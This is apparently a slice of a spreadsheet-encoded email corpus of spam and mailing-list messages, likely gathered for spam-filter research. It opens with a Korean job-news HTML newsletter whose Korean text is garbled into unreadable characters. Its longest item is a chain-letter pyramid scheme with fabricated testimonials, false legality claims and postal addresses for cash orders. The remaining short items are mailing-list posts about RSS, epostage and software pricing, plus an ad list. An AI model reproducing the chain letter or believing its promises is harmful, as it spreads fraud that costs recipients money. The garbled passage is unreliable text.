 ۵Ǵ ̶, ߴ  Ȯ غ غ.&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/B&gt;
 &lt;P&gt;&lt;FONT face=&gt;&lt;SPAN style="FONT-SIZE: 10pt"&gt;&lt;IMG height=9
 src="http://image.hanmail.net/hanmail/s_img/recruit/g_arrow02.gif"
 width=9 align=absMiddle&gt; &lt;/SPAN&gt;&lt;/FONT&gt;&lt;B&gt;&lt;FONT face=&gt;&lt;SPAN
 style="FONT-SIZE: 10pt"&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;FONT
 face=&gt;&lt;SPAN style="FONT-SIZE: 10pt"&gt; : 98  IMF ۵ Ƹ ص
 //ǰ Ĵ  оߺٵ ġ߰     ε Ÿ
 ٽ Ǿ.  2002 , ī ȣȲ  , , о 
 䰡  ,  ä   ִ.  Ϲݱ η½ 
 .&lt;/SPAN&gt;&lt;/FONT&gt;
 &lt;P&gt;&lt;FONT face=&gt;&lt;SPAN style="FONT-SIZE: 10pt"&gt;оߴ ڰ 
  . ǿ ϰ ̴ ڰδ ڻ, ڻ(FP),
 繫(FRM) . Ư ǻ翡 ٹ ̵̶ ڻ糪 ڻ ڰ ⺻ ǰ
  ݵ صε . &lt;IMG height=10
 src="http://image.hanmail.net/hanmail/s_img/recruit/g_arrow04.gif"
 width=10 align=absMiddle&gt; &lt;/SPAN&gt;&lt;/FONT&gt;&lt;A
 href="http://job.daum.net/info/lacademy/lice_list.asp?officekind=2"
 target=new&gt;&lt;FONT face=&gt;&lt;SPAN style="FONT-SIZE: 10pt"&gt;
 &lt;/SPAN&gt;&lt;/FONT&gt;&lt;/A&gt;
 &lt;P&gt;&lt;FONT face=&gt;&lt;SPAN style="FONT-SIZE: 10pt"&gt;&lt;IMG height=9
 src="http://image.hanmail.net/hanmail/s_img/recruit/g_arrow02.gif"
 width=9 align=absMiddle&gt; &lt;/SPAN&gt;&lt;/FONT&gt;&lt;B&gt;&lt;FONT face=&gt;&lt;SPAN
 style="FONT-SIZE: 10pt"&gt;IT&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;FONT
 face=&gt;&lt;SPAN style="FONT-SIZE: 10pt"&gt; : ص鼭 IT/ͳ 
 ͱ  , ͳ оߴ ͳ  ͼ ܱ躸 ξ ռ ִ Ȳ̴.
     鼭    ִ . Ϲݱ η½
 .&lt;/SPAN&gt;&lt;/FONT&gt;
 &lt;P&gt;&lt;FONT face=&gt;&lt;SPAN style="FONT-SIZE: 10pt"&gt;ITо߿ η¼ 
   ڰ ٴ ǹ ؼ  ȣϴ  ִ.   ٲپ Ѵٰų 
  ǹ Ѵٸ ̹  п ǹ  ? &lt;IMG height=10
 src="http://image.hanmail.net/hanmail/s_img/recruit/g_arrow04.gif"
 width=10 align=absMiddle&gt; &lt;/SPAN&gt;&lt;/FONT&gt;&lt;A
 href="http://www.ibd.pe.kr" target=new&gt;&lt;FONT face=&gt;&lt;SPAN
 style="FONT-SIZE: 10pt"&gt;õITп &lt;/SPAN&gt;&lt;/FONT&gt;&lt;/A&gt;
 &lt;P&gt;&lt;FONT face=&gt;&lt;SPAN style="FONT-SIZE: 10pt"&gt;&lt;IMG height=9
 src="http://image.hanmail.net/hanmail/s_img/recruit/g_arrow02.gif"
 width=9 align=absMiddle&gt; &lt;/SPAN&gt;&lt;/FONT&gt;&lt;B&gt;&lt;FONT face=&gt;&lt;SPAN
 style="FONT-SIZE: 10pt"&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;FONT
 face=&gt;&lt;SPAN style="FONT-SIZE: 10pt"&gt; : ۺо ߿ Ƴ, ,
 ۰, PD    α̸ ϰ ִ ̴.   Ӱ ް ִ  ٷ
 'ȣƮ'. ȣƮ ؼ  ü    ̿ αⰡ 
 ̴.  ġ° ǥ ִٸ   ѹ غ . &lt;IMG height=10
 src="http://image.hanmail.net/hanmail/s_img/recruit/g_arrow04.gif"
 width=10 align=absMiddle&gt; &lt;/SPAN&gt;&lt;/FONT&gt;&lt;A
 href="http://job1.daum.net/info/news/newsview.asp?id=7731"
 target=new&gt;&lt;FONT face=&gt;&lt;SPAN
 style="FONT-SIZE: 10pt"&gt;ȣƮ?&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/A&gt;
 &lt;P&gt;&lt;FONT face=&gt;&lt;SPAN style="FONT-SIZE: 10pt"&gt;ȣƮ Բ '
 о߿ '̶ Ҹ MD(Merchandiser). &lt;IMG height=10
 src="http://image.hanmail.net/hanmail/s_img/recruit/g_arrow04.gif"
 width=10 align=absMiddle&gt; &lt;/SPAN&gt;&lt;/FONT&gt;&lt;A
 href="http://job1.daum.net/info/news/newsview.asp?id=8457"
 target=new&gt;&lt;FONT face=&gt;&lt;SPAN style="FONT-SIZE: 10pt"&gt; 
 MD &lt;/SPAN&gt;&lt;/FONT&gt;&lt;/A&gt;
 &lt;P&gt;&lt;FONT face=&gt;&lt;SPAN style="FONT-SIZE: 10pt"&gt;&lt;IMG height=9
 src="http://image.hanmail.net/hanmail/s_img/recruit/g_arrow02.gif"
 width=9 align=absMiddle&gt; &lt;/SPAN&gt;&lt;/FONT&gt;&lt;B&gt;&lt;FONT face=&gt;&lt;SPAN
 style="FONT-SIZE: 10pt"&gt;Ƽ&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;FONT
 face=&gt;&lt;SPAN style="FONT-SIZE: 10pt"&gt; : ڸ Ǵ ǰ   鼭
 Ƽ   ȰȲ ° ִ. ̿ Ǻΰ, ߰,  Ͽ ϾƼƮ,
 ũƼƮ, ̳, ÷͸ 缺ϴ п鵵  ܳ ִ ߼. ڸ  
 Ӹ ƴ϶ Ե ߿ ǰ ִ о̸,  'ɹ̳'̶ Ҹ Ǻΰ  
 ڵ αⰡ .  Ǻΰ ڰ ϰ  Ǻΰ, Ǻθ  η¼ 
 . &lt;IMG height=10
 src="http://image.hanmail.net/hanmail/s_img/recruit/g_arrow04.gif"
 width=10 align=absMiddle&gt; &lt;/SPAN&gt;&lt;/FONT&gt;&lt;A
 href="http://job.daum.net/edu/index.html" target=new&gt;&lt;FONT
 face=&gt;&lt;SPAN style="FONT-SIZE: 10pt"&gt;õƼп
 &lt;/SPAN&gt;&lt;/FONT&gt;&lt;/A&gt;
 &lt;P&gt;&lt;FONT face=&gt;&lt;SPAN style="FONT-SIZE: 10pt"&gt;&lt;IMG height=9
 src="http://image.hanmail.net/hanmail/s_img/recruit/g_arrow02.gif"
 width=9 align=absMiddle&gt; &lt;/SPAN&gt;&lt;/FONT&gt;&lt;B&gt;&lt;FONT face=&gt;&lt;SPAN
 style="FONT-SIZE: 10pt"&gt;׸&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;FONT
 face=&gt;&lt;SPAN style="FONT-SIZE: 10pt"&gt; : ۳ ฮ   ٶ
 Ҹ鼭 ׸  ް ִ.  MBC α⸮ 濵ǰ ִ 'Ͽ콺' ؼ ̹
 ฮ̳ ׸ ָް ִ . ׸  о߿  Ϸ ݵ  ڰ ʿϴ.
 &lt;IMG height=10
 src="http://image.hanmail.net/hanmail/s_img/recruit/g_arrow04.gif"
 width=10 align=absMiddle&gt; &lt;/SPAN&gt;&lt;/FONT&gt;&lt;A
 href="http://job.daum.net/info/lacademy/view_liceoff.asp?kind=12"
 target=new&gt;&lt;FONT face=&gt;&lt;SPAN style="FONT-SIZE: 10pt"&gt;
 ڰ&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/A&gt; &lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD width=5 height=7&gt;&lt;/TD&gt;
 &lt;TD width=665&gt;
 &lt;DIV align=center&gt;&lt;FONT size=2&gt;&lt;FONT face=&gt;&lt;FONT size=2&gt;&lt;SPAN
 style="FONT-SIZE: 9pt"&gt;0  Ÿ ̿  ȣ     50 ǰ
 [] Դϴ.&lt;BR&gt;0. &lt;/SPAN&gt;&lt;SPAN style="FONT-SIZE: 9pt"&gt; ּҴ
 ,@memo@  ˰ Ȱ̸, E-Mail ּ ܿ, ٸ    ʽϴ&lt;/SPAN&gt;&lt;SPAN
 style="FONT-SIZE: 9pt"&gt;. &lt;/SPAN&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;SPAN
 style="FONT-SIZE: 9pt"&gt;&lt;FONT face= size=2&gt;   ߼ؼ 
 ˼մϴ&amp;nbsp;&lt;BR&gt;&lt;/FONT&gt;&lt;/SPAN&gt;&lt;FONT face= size=2&gt;&lt;SPAN
 style="FONT-SIZE: 9pt"&gt;&lt;FONT face="Times New Roman" size=2&gt;
 &lt;/FONT&gt;&lt;A href="mailto:master@ibd.pe.kr?subject=andyliao@bigfoot.com  ڷν #źմϴ#&amp;amp;body=andyliao@bigfoot.com   Ʈ !"&gt;&lt;FONT
 color=#000000&gt;&lt;FONT size=2&gt;&lt;FONT face="Times New Roman"&gt;[&lt;FONT
 color=#0000ff&gt; ź]&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/A&gt;&amp;nbsp;ŬϽþ 
 ֽø ٽô   ʵ ϰڽϴ. &amp;nbsp;մϴ&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;FONT
 size=2&gt;.&lt;/FONT&gt;&lt;/DIV&gt;&lt;/TD&gt;
 &lt;TD width=13&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;/BODY&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: "I meditated in a cave for 12 years and now I'm here to tell you
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8424915,1717/
 Date: 2002-10-01T09:35:16+01:00
 [IMG: http://www.newsisfree.com/Images/fark/salon.gif ([Salon])]
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, Feb 01, 2002 at 05:41:32PM +0200, Harri Haataja wrote:
 &gt; I have a local one for the main and upgrades from somewhere plus my own
 &gt; at $ORKPLACE.
 Olen ajatellut pystytt itselleni lokaalin apt-varaston, kun Suomesta ei 
 tunnu lytyvn julkista peili. Osaisitko avittaa hiukan asiassa, eli 
 kuinka lhte liikkeelle? Ensin kannattanee peilata varsinainen RH:n rpm:t 
 jostain, vaan mill softalla (rsync?) ja mist (funet?) tuo kannattaa 
 tehd, ajatuksia?
 -- 
 Peter
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Bruce Loebrich has scraped RSS feeds for Google news, and a RSS
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/24#When:3:59:56PM
 Date: Tue, 24 Sep 2002 22:59:56 GMT
 Bruce Loebrich[1] has scraped RSS feeds for Google news, and a RSS 2.0 success 
 story. In other words, it's okay to use the features in 2.0. We're doing it at 
 UserLand and so is Bruce.
 [1] http://radio.weblogs.com/0104308/2002/09/24.html
</t>
  </si>
  <si>
    <t xml:space="preserve">1) Join the Web's Hottest &amp; Fastest Growing Community
 http://www.adclick.ws/p.cfm?o=259&amp;s=pk007
 2) Guaranteed to lose 10-12 lbs in 30 days
 Slim Patch - Weight Loss Patches
 http://www.adclick.ws/p.cfm?o=249&amp;s=pk007
 3) Get the Child Support You Deserve - Free Legal Advice
 http://www.adclick.ws/p.cfm?o=245&amp;s=pk002
 4) Fight The Risk of Cancer - Save Your Lungs
 http://www.adclick.ws/p.cfm?o=315&amp;s=pk007
 5) Start Your Online Private Photo Album 
 http://www.adclick.ws/p.cfm?o=285&amp;s=pk007
 Have a Wonderful Day,
 Offer Manager
 PrizeMama
 If you wish to leave this list please use the link below.
 http://www.qves.com/trim/?zzzz@spamassassin.taint.org%7C17%7C308417
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: The last time you spent $25 did you make $100,000,s?  Nows your Chance!
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello
 You may have seen this business before and
 ignored it. I know I did - many times! However,
 please take a few moments to read this letter.
 I was amazed when the profit potential of this
 business finally sunk in... and it works!
 With easy-to-use e-mail tools and opt-in e-mail,
 success in this business is now fast, easy and
 well within the capabilities of ordinary people
 who know little about internet marketing. And the
 earnings potential is truly staggering!
 I'll make you a promise. READ THIS E-MAIL TO THE END! -
 follow what it says to the letter - and you will not
 worry whether a RECESSION is coming or not, who is
 President, or whether you keep your current job or not.
 Yes, I know what you are thinking. I never responded
 to one of these before either. One day though,
 something just said: "You throw away $25.00 going to
 a movie for 2 hours with your wife. What the heck."
 Believe me, no matter where you believe those "feelings"
 come from, I thank every day that I had that feeling.
 I cannot imagine where I would be or what I would be
 doing had I not. Read on. It's true. Every word of it.
 It is legal. I checked. Simply because you are buying
 and selling something of value.
 AS SEEN ON NATIONAL TV:
 Making over half a million dollars every 4 to 5
 months from your home.
 THANKS TO THE COMPUTER AGE AND THE INTERNET! 
 ==================================================
 BE AN INTERNET MILLIONAIRE LIKE OTHERS WITHIN A YEAR!!!
 Before you say "Bull", please read the following.
 This is the letter you have been hearing about on the
 news lately. Due to the popularity of this letter on
 the internet, a national weekly news program recently
 devoted an entire show to the investigation of this
 program described below, to see if it really can make
 people money. The show also investigated whether or
 not the program was legal.
 Their findings proved once and for all that there are "absolutely 
 NO laws prohibiting the participation in the program and if 
 people can 'follow the simple instructions' they are bound to 
 make some mega bucks with only $25 out of pocket cost".
 DUE TO THE RECENT INCREASE OF POPULARITY &amp; RESPECT
 THIS PROGRAM HAS ATTAINED, IT IS CURRENTLY WORKING
 BETTER THAN EVER.
 This is what one had to say: "Thanks to this
 profitable opportunity. I was approached many times
 before but each time I passed on it. I am so glad
 I finally joined just to see what one could expect
 in return for the minimal effort and money required.
 To my astonishment, I received a total $610,470.00
 in 21 weeks, with money still coming in."
 Pam Hedland, Fort Lee, New Jersey. 
 ==================================================
 Another said: "This program has been around for a
 long time but I never believed in it. But one day
 when I received this again in the mail I decided
 to gamble my $25 on it. I followed the simple
 instructions and walaa ..... 3 weeks later the
 money started to come in. First month I only made
 $240.00 but the next 2 months after that I made
 a total of $290,000.00. So far, in the past 8 months
 by re-entering the program, I have made over
 $710,000.00 and I am playing it again. The key to
 success in this program is to follow the simple
 steps and NOT change anything."
 More testimonials later but first, =======
 ==== PRINT THIS NOW FOR YOUR FUTURE REFERENCE ==== 
 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
 If you would like to make at least $500,000 every
 4 to 5 months easily and comfortably, please read the 
 following...THEN READ IT AGAIN and AGAIN!!!
 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
 FOLLOW THE SIMPLE INSTRUCTION BELOW AND
 YOUR FINANCIAL DREAMS WILL COME TRUE, GUARANTEED!
 INSTRUCTIONS:
 =====Order all 5 reports shown on the list below =====
 For each report, send $5 CASH, THE NAME &amp; NUMBER OF THE
 REPORT YOU ARE ORDERING and YOUR E-MAIL ADDRESS to the
 person whose name appears ON THAT LIST next to the report.
 MAKE SURE YOUR RETURN ADDRESS IS ON  YOUR ENVELOPE TOP
 LEFT CORNER in case of any mail problems.
 ===WHEN YOU PLACE YOUR ORDER, MAKE SURE ===
 ===YOU ORDER EACH OF THE 5 REPORTS! ===
 You will need all 5 reports so that you can save
 them on your computer and resell them.
 YOUR TOTAL COST $5 X 5 = $25.00.
 Within a few days you will receive, via e-mail, each
 of the 5 reports from these 5 different individuals.
 Save them on your computer so they will be accessible
 for you to send to the 1,000's of people who will
 order them from you. Also make a floppy of these
 reports and keep it on your desk in case something
 happens to your computer.
 IMPORTANT - DO NOT alter the names of the people who
 are listed next to each report, or their sequence on
 the list, in any way other than what is instructed
 below in steps 1 through 6 or you will lose out
 on the majority of your profits. Once you
 understand the way this works, you will also
 see how it will not work if you change it.
 Remember, this method has been tested, and if you
 alter it, it will NOT work!!! People have tried
 to put their friends'/relatives' names on all five
 thinking they could get all the money. But it does
 not work this way. Believe us, some have tried to
 be greedy and then nothing happened. So Do Not
 try to change anything other than what is instructed.
 Because if you do, it will not work for you.
 Remember, honesty reaps the reward!!!
 This IS a legitimate BUSINESS. You are offering a
 product for sale and getting paid for it. Treat it
 as such and you will be VERY profitable in a short
 period of time.
 1.. After you have ordered all 5 reports, take this advertisement 
 and REMOVE the name &amp; address of the person in REPORT # 5. This 
 person has made it through the cycle and is no doubt counting 
 their fortune.
 2.. Move the name &amp; address in REPORT # 4 down TO REPORT # 5.
 3.. Move the name &amp; address in REPORT # 3 down TO REPORT # 4.
 4.. Move the name &amp; address in REPORT # 2 down TO REPORT # 3.
 5.. Move the name &amp; address in REPORT # 1 down TO REPORT # 2
 6.... Insert YOUR name &amp; address in the REPORT # 1 Position.
 PLEASE MAKE SURE you copy every name &amp; address
 ACCURATELY! This is critical to YOUR success.
 ==================================================
 **** Take this entire letter, with the modified
 list of names, and save it on your computer.
 DO NOT MAKE ANY OTHER CHANGES.
 Save this on a disk as well just in case you lose
 any data. To assist you with marketing your business
 on the internet, the 5 reports you purchase will
 provide you with invaluable marketing information
 which includes how to send bulk e-mails legally,
 where to find thousands of free classified ads and
 much more. There are 2 primary methods to get this
 venture going:
 METHOD # 1: BY SENDING BULK E-MAIL LEGALLY 
 ==================================================
 Let's say that you decide to start small, just to see
 how it goes, and we will assume you and those involved
 send out only 5,000 e-mails each. Let's also assume
 that the mailing receives only a 0.2% (2/10 of 1%)
 response (the response could be much better but let's
 just say it is only 0.2%). Also many people will send
 out hundreds of thousands of e-mails instead of only
 5,000 each.
 Continuing with this example, you send out only
 5,000 e-mails. With a 0.2% response, that is only
 10 orders for report # 1. Those 10 people responded
 by sending out 5,000 e-mails each for a total of
 50,000. Out of those 50,000 e-mails only 0.2%
 responded with orders. That's 100 people who
 responded and ordered Report # 2.
 Those 100 people mail out 5,000 e-mails each for
 a total of 500,000 e-mails. The 0.2% response to
 that is 1000 orders for Report # 3.
 Those 1000 people send 5,000 e-mails each for a
 total of 5 million e-mails sent out. The 0.2%
 response is 10,000 orders for Report # 4.
 Those 10,000 people send out 5,000 e-mails each
 for a total of 50,000,000 (50 million) e-mails.
 The 0.2% response to that is 100,000 orders for
 Report # 5.
 THAT'S 100,000 ORDERS TIMES $5 EACH = $500,000.00
 (half a million dollars).
 Your total income in this example is: 1..... $50
 + 2..... $500 + 3.....$5,000 + 4..... $50,000
 + 5.... $500,000 .... Grand Total=$555,550.00
 NUMBERS DO NOT LIE. GET A PENCIL &amp; PAPER AND
 FIGURE OUT THE WORST POSSIBLE RESPONSES AND NO
 MATTER HOW YOU CALCULATE IT, YOU WILL STILL
 MAKE A LOT OF MONEY! 
 ==================================================
 REMEMBER FRIEND, THIS IS ASSUMING ONLY 10 PEOPLE
 ORDERING OUT OF 5,000 YOU MAILED TO. Dare to think
 for a moment what would happen if everyone or half
 or even one 4th of those people mailed 100,000
 e-mails each or more?
 There are over 150 million people on the internet
 worldwide and counting, with thousands more coming
 online every day. Believe me, many people will do
 just that, and more!
 METHOD # 2: BY PLACING FREE ADS ON THE INTERNET 
 ==================================================
 Advertising on the net is very, very inexpensive and
 there are hundreds of FREE places to advertise.
 Placing a lot of free ads on the internet will
 easily get a larger response. We strongly suggest
 you start with Method # 1 and add METHOD # 2 as you
 go along. For every $5 you receive, all you must
 do is e-mail them the report they ordered. That's it.
 Always provide same day service on all orders.
 This will guarantee that the e-mail they send out,
 with your name and address on it, will be prompt
 because they cannot advertise until they receive
 the report.
 ===========AVAILABLE REPORTS ====================
 The reason for the "cash" is not because this is
 illegal or somehow "wrong". It is simply about time.
 Time for checks or credit cards to be cleared or
 approved, etc. Concealing it is simply so no one
 can SEE there is money in the envelope and steal
 it before it gets to you.
 ORDER EACH REPORT BY ITS NUMBER &amp; NAME ONLY.
 Notes: Always send $5 cash (U.S. CURRENCY) for
 each report. Checks NOT accepted. Make sure the
 cash is concealed by wrapping it in at least
 2 sheets of paper. On one of those sheets of
 paper, write the NUMBER &amp; the NAME of the report
 you are ordering, YOUR E-MAIL ADDRESS and your
 name and postal address.
 PLACE YOUR ORDER FOR THESE REPORTS NOW :
  ==================================================
 REPORT # 1: "The Insider's Guide To Advertising
 for Free On The Net"
 Order Report #: 1 from
 Rui Sousa Santos
 P.O. Box 132
 Taylors Lakes VIC  3038
 Australia 
 ______________________________________________________
 REPORT # 2: "The Insider's Guide To Sending Bulk
 Email On The Net"
 Order Report # 2 from:
 Richard Moulton
 P.O. Box 82
 Hot Springs,MT 59845
 USA
 ______________________________________________________
 REPORT # 3: "Secret To Multilevel Marketing On The Net"
 Order Report # 3 from:
 J.Siden
 krondikesvdgen 54 A
 83147 Vstersund
 Sweden
 ______________________________________________________
 REPORT # 4: "How To Become A Millionaire Using MLM &amp; The Net"
 Order Report # 4 from:
 Francis Kidd
 P.O. Box 209
 Homestead,PA 15120
 USA
 ______________________________________________________
 REPORT # 5: "How To Send Out One Million Emails For Free"
 Order Report # 5 From:
 J. Johns
 P.O. Box 277806
 Sacramento, CA 95827
 USA
  ______________________________________________________
 $$$$$$$$$ YOUR SUCCESS GUIDELINES $$$$$$$$$$$
 Follow these guidelines to guarantee your success:
 === If you do not receive at least 10 orders for
 Report #1 within 2 weeks, continue sending e-mails
 until you do.
 === After you have received 10 orders, 2 to 3 weeks
 after that you should receive 100 orders or more for
 REPORT # 2. If you do not, continue advertising or
 sending e-mails until you do.
 ** Once you have received 100 or more orders for
 Report # 2, YOU CAN RELAX, because the system is
 already working for you, and the cash will continue
 to roll in ! THIS IS IMPORTANT TO REMEMBER: Every time
 your name is moved down on the list, you are placed
 in front of a different report.
 You can KEEP TRACK of your PROGRESS by watching which
 report people are ordering from you. IF YOU WANT TO
 GENERATE MORE INCOME SEND ANOTHER BATCH OF E-MAILS
 AND START THE WHOLE PROCESS AGAIN. There is NO LIMIT
 to the income you can generate from this business !!! 
 =================================================
 FOLLOWING IS A NOTE FROM THE ORIGINATOR OF THIS PROGRAM:
 You have just received information that can give you
 financial freedom for the rest of your life, with
 NO RISK and JUST A LITTLE BIT OF EFFORT. You can
 make more money in the next few weeks and months
 than you have ever imagined. Follow the program
 EXACTLY AS INSTRUCTED. Do Not change it in any way.
 It works exceedingly well as it is now.
 Remember to e-mail a copy of this exciting report
 after you have put your name and address in
 Report #1 and moved others to #2 .....# 5 as
 instructed above. One of the people you send this
 to may send out 100,000 or more e-mails and your
 name will be on every one of them.
 Remember though, the more you send out the more
 potential customers you will reach. So my friend,
 I have given you the ideas, information, materials
 and opportunity to become financially independent.
 IT IS UP TO YOU NOW !
 =============MORE TESTIMONIALS===============
 "My name is Mitchell. My wife, Jody and I live in
 Chicago. I am an accountant with a major U.S.
 Corporation and I make pretty good money. When I
 received this program I grumbled to Jody about
 receiving 'junk mail'. I made fun of the whole
 thing, spouting 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received total $ 147,200.00 ......... all cash!
 I was shocked. I have joined Jody in her 'hobby'."
 Mitchell Wolf M.D., Chicago, Illinois 
 ================================================
 "Not being the gambling type, it took me several
 weeks to make up my mind to participate in this plan.
 But conservative as I am, I decided that the initial
 investment was so little that there was just no way
 that I wouldn't get enough orders to at least get
 my money back. I was surprised when I found my
 medium size post office box crammed with orders.
 I made $319,210.00 in the first 12 weeks.
 The nice thing about this deal is that it does not
 matter where people live. There simply isn't a
 better investment with a faster return and so big."
 Dan Sondstrom, Alberta, Canada 
 =================================================
 "I had received this program before. I deleted it,
 but later I wondered if I should have given it a try.
 Of course, I had no idea who to contact to get
 another copy, so I had to wait until I was e-mailed
 again by someone else......... 11 months passed then
 it luckily came again...... I did not delete this one!
 I made more than $490,000 on my first try and all the
 money came within 22 weeks."
 Susan De Suza, New York, N.Y. 
 =================================================
 "It really is a great opportunity to make relatively
 easy money with little cost to you. I followed the
 simple instructions carefully and within 10 days the
 money started to come in. My first month I made $20,
 in the 2nd month I made $560.00 and by the end of the
 third month my total cash count was $362,840.00.
 Life is beautiful, Thanx to internet."
 Fred Dellaca, Westport, New Zealand 
 =================================================
 ORDER YOUR REPORTS TODAY AND GET STARTED ON YOUR
 ROAD TO FINANCIAL FREEDOM !
 =================================================
 If you have any questions of the legality of this
 program, contact the Office of Associate Director
 for Marketing Practices, Federal Trade Commission,
 Bureau of Consumer Protection, Washington, D.C.
 Anti-SPAM Policy Disclaimer: Under Bill s.1618
 Title III passed by the 105th U. S. Congress,
 mail cannot be considered spam as long as we
 include contact information and a remove link for
 removal from this mailing list. If this e-mail is
 unsolicited, please accept our apologies.
 Per the proposed H.R. 3113 Unsolicited Commercial
 Electronic Mail Act of 2000, further transmissions 
 to you by the sender may be stopped at NO COST to you!
 This message is not intended for residents in the
 State of Washington, Virginia or California,
 screening of addresses has been done to the best
 of our technical ability.
 This is a one time mailing and this list will
 never be used again.
 To be removed from the mailing list  reply to
 this message with "REMOVE ME" as the subject.
</t>
  </si>
  <si>
    <t xml:space="preserve">yeshterday we f*cked up our gubernatorial election, too.  results to be
 contested by reno.  same six districts that were sued in 2000 still came up
 gimpy.
 i suggested to jeb via e-mail we hold a run-off pinata party.  hoist up a
 papier mache donkey and a papier mache elephant.  first one to batted open
 wins.
 -----Original Message-----
 From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of Tom
 Sent: Wednesday, September 11, 2002 9:16 PM
 To: fork@spamassassin.taint.org
 Subject: Bush blew take two
 http://www.washingtonpost.com/wp-dyn/articles/A63543-2002Sep10.html
 "MIAMI, Sept. 10 -- A two-gram rock of crack
 cocaine was found inside the shoe of Florida
 Gov. Jeb Bush's 25-year-old daughter by workers
 at the central Florida rehabilitation center
 where she is undergoing court-ordered drug
 treatment, Orlando police said today.
 Noelle Bush was not arrested because witnesses
 would not give sworn statements, but the
 incident is under investigation, according to
 Orlando police spokesman Orlando Rolon."
 Wow, the witnesses would not nark of a Bush girl in an era where there are
 no mare restrictions on being held without a cause?
 Imagine that...
 -tom
</t>
  </si>
  <si>
    <t xml:space="preserve">http://www.techcentralstation.com/1051/printer.jsp?CID=1051-080802A
 &gt;Mail Me the Money!
 &gt;By David Friedman 08/08/2002
 David is a very bright fellow. But this time he's
 several years behind. The idea of using epostage
 to stop spam has been discussed quite a bit. The
 problem is how to get over the adoption hump.
 Until most people are taking one form of epostage,
 most people don't have enough incentive to download
 and install something that allows them to pay it.
 Until most people are set up to pay it, any form of
 epostage I require closes my mailbox to unknown
 senders from whom I want to receive mail. And even
 from known senders. Giving someone my email address
 doesn't automatically put them in my white list.
 Hashcash tries to lower the adoption barrier by
 removing the need to pay money for epostage.
 Instead, the sender burns processing time on his
 computer, answering a cryptographically hard
 challenge. But even this requires set-up. There is
 inadequate incentive to do so until there is a
 standard mechanism, but no standard mechanism is
 born until a significant fraction of the market
 has taken that first step. It may take government
 action, to institute an effective epostage
 standard!
 I think the better idea is to require that people
 off your white list "hand sign" email to you. A
 couple of companies are now trying to implement
 this. An email sender, if not on your white list,
 must respond to a verification email or go to a
 website, by a process that is very simply for a
 human sender, but difficult for a spammer to
 automate. Where epostage requires a standard
 mechanism, a variety of mechanisms for "hand
 signing" would frustrate spammers while making it
 no more difficult for legitimate senders. I'm
 hoping Eudora and some of the other big mail
 clients incorporate this kind of feature. The
 advantage to putting this in the mail client is
 that the required "hand sign" can be personalized:
   "Your attempt to email David Friedman is
   blocked until you fill in the blank: The
   Incredible ______ Machine."
 It will be a long time before spammers have a
 process that defeats millions of personal
 challenges. On the other hand, I have a hack in
 mind that would work a large percentage of the
 time. But I'm not telling. If spammers did figure
 out such hacks, people would then improve their
 challenges. Yeah, this would lead to another
 arms race, and spam would leak through to the
 unwitting. But this arms race is one that helps
 spammers identify and target the part of the
 population whose challenges are sub-par, which
 is their natural prey. People like David aren't
 in the market for herbal Viagra or back alley
 debt consolidation.
 Since David is an anarchist, I'm surprised he
 didn't point out that spam is the result of
 government. The government is ineffective at
 preventing spam, but it DOES prevent individuals
 and ISPs from taking retribution against spammers.
 _________________________________________________________________
 MSN Photos is the easiest way to share and print your photos: 
 http://photos.msn.com/support/worldwide.aspx
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">I develop software and my pricing is that I charge the first set of
 customers that drive the features included quite a bit, then charge the
 majority of the customers a small fee, and when I've earned back what I
 invested (including my hourly wage) then I release that software for free
 and either start working on a newer version (again back to the adding
 features step) or on a new product. If you can't find someone willing to
 pay your costs of development then most likely there really isn't a need
 for the product you're trying to sell and you shouldn't develop it. If you
 have to resort to free versions with lame ass ads and stuff then that is a
 strong indication to get a new project IMO.  :)
 &gt; We were sitting here talking about Opera, and the fact that it's not
 &gt; free anymore (unless you want the scrollypollies), and how that sucked
 &gt; and stuff, and someone said something about nagware, and I
 &gt; misinterpretted it as snag ware, which mainly means, oh yeh, right, I'm
 &gt; gonna buy this -eyeroll- where's someone with a key?  LOL So who is it
 &gt; again who's on this list who's associated with Opera?  Why's the free
 &gt; one using the same LAME idea netzero, etc useD?  I know what kind of
 &gt; costs are involved in creating software like this, and I understand
 &gt; everyone needs to eat, but if someone can get netscape for free, and
 &gt; opera isn't free, then, hmmm...  I imagine this email is going to bring
 &gt; some bricks down on my head, but well, go for it, I gots my helmet.  (:
 &gt; Cindy P.S. GregB, you there?  (:
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">So to update from GNOME 1.4 to 2.0, after modifying
